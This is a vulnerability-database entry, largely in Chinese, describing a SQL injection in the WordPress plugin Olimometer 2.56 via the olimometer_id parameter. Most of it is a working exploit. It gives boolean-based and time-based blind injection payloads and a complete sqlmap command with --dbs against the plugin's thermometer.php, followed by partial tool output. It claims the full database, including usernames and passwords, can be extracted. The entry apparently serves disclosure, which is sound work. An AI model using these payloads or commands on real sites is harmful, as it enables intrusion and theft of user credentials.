Wordpress Plugin Olimometer 2.56 -...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

漏洞参数: olimometer_id= 使用sqlmap ``` Parameter: olimometer_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: olimometer_id=1 AND 6227=6227 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: olimometer_id=1 AND SLEEP(5) ``` “olimometer_id”参数使用SQL方法,我们能够从example.com实例网站获得数据库名称。如果有这样的漏洞,使用不同的参数运行SQLmap,我们可以得到完整的数据库,包括用户名和密码。 攻击示例,如下: ``` root@kali:~# sqlmap -u http://EXAMPLE.COM/wp-content/plugins/olimometer/thermometer.php?olimometer_id=1 --dbs --threads=5 --random-agent --no-cast --- Parameter: olimometer_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: olimometer_id=1 AND 6227=6227 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: olimometer_id=1 AND SLEEP(5) --- [11:14:21] [INFO] the back-end DBMS is MySQL web application technology: Nginx back-end DBMS: MySQL >= 5.0.12 [11:14:21] [INFO] fetching database names...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息